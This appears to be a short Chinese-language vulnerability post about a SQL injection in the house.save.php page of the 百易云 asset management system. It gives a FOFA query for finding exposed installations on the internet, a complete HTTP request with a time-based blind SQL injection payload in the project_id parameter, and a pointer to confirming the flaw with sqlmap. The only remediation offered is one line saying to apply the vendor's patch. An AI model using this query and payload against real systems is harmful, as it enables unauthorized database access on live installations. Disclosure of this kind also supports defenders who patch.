百易云资产系统 house.save.php SQL注入
0x01 漏洞描述:
百易云资产管理运营系统是一款综合性资产管理平台,旨在帮助企业高效管理和优化资产生命周期。系统提供资产采购、维护、报废等全流程管理功能,并通过云端技术实现数据的实时同步与分析。用户可以轻松跟踪资产状态、生成报告,并进行预算控制,提升资产利用效率,降低运营成本。百易云以其智能化、自动化的特点,助力企业实现资产管理的科学化与精细化。其在house.save.php中存在sql注入。
0x02 搜索语句:
Fofa:body="不要着急,点此"
0x03 漏洞复现:
GET /adminx/house.save.php?project_id=1%20and%20(select%201%20from%20(select(sleep(5-(if((1=1),%200,%202)))))test)#---- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive
sqlmap验证
0x04 修复建议:
官方已发布补丁 请即时修复。